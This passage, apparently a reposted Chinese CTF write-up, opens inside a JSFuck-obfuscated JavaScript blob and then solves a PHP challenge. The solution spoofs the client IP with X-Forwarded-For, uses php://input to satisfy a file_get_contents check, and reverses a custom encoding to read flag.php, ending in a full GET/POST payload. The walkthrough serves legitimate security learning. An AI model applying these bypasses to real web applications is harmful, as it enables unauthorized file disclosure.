+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])
</code></pre>
<p>这种加密简单啊,直接F12打开控制台,将这串字符粘贴上去,然后执行,弹窗叫我们post形式传参Merak,那还能怎么办,依着他呗!</p>
<p>传参后,直接爆出了源码:</p>
<pre><code class="language-php"><?php error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die(); }
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
} //定义了一个change函数,看起来是个小小的加密函数,到时候需要我们根据这个代码来解密
echo 'Local access only!'."<br/>";
$ip = getIp();
//这边需要伪造ip为127.0.0.0
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); //关键代码,看到危险函数file_get_contents,可以由此读取flag.php
}
?>
</code></pre>
<p>进行简单的代码审计,就是需要我们经过两个简单的绕过(伪造ip和file_get_contents伪协议漏洞),然后进行反向加密flag.php就可以了,那么话不多说,直接开干。</p>
<p>伪造ip:直接利用xff来伪造,在请求头加上:<strong>X-Forwarded-For:127.0.0.1</strong></p>
<p>file_get_contents伪协议漏洞:利用php://input协议进行绕过,首先GET传参:?2333=php://input,然后post传参:todat is a happy day</p>
<p>反写脚本:</p>
<pre><code class="language-php"><?php
$re = "flag.php";
function decrypt($re){
$v = "";
for($i=0;$i<strlen($re);$i++){
$v.=chr(ord($re[$i])-$i*2);
}
$v=base64_encode($v);
echo $v;
}
decrypt($re);
?>
</code></pre>
<p>运行得到:ZmpdYSZmXGI=,再通过GET传参?file=ZmpdYSZmXGI=</p>
<p>最终<strong>payload:</strong></p>
<p><strong>GET:2333=php://input&file=ZmpdYSZmXGI=</strong></p>
<p><strong>POST:todat is a happy day</strong></p>
<p>再记得修改请求头来伪造ip,即可得到flag。</p>
<h3 id="总结-1">总结:</h3>
<p>打完收工,终于可以:<strong><s>原神启动</s>(原来你也玩原神!)</strong></p><br><br>
来源:https://www.cnblogs.com/gxngxngxn/p/17410173.html
頁:
[1]